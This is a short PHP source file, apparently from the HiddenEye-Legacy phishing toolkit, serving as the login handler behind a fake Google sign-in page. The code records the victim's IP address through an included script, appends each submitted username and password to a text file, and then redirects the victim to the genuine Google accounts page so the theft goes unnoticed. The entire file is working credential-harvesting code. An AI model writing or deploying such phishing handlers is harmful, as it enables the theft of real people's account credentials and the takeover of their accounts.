HiddenEye-Legacy/WebPages/google_advanced_web/login.php
Usama Abdul Sattar 9f2b05ac7b
Update login.php
2018-06-08 16:57:52 +05:00

7 lines
213 B
PHP

<?php
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://accounts.google.com');
exit();